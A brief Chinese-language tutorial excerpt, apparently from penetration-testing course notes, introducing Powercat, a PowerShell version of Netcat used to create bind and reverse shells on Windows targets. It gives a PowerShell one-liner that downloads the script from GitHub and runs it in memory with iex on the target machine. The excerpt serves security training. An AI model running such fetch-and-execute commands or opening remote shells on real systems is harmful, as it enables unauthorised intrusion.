目录
介绍
Powercat实质上是由besimorhino编写的Netcat的PowerShell版本我们可以将这个脚本下载到Windows主机上,以利用PowerShell的优势并简化绑定/反向shell的创建。
使用方法
加载
PS C:\Users\Offsec> . .\powercat.ps1
在线下载
如果目标机器连接到Internet,我们可以再次使用方便的iex cmdlet对远程脚本进行同样的操作,如下所示:
PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')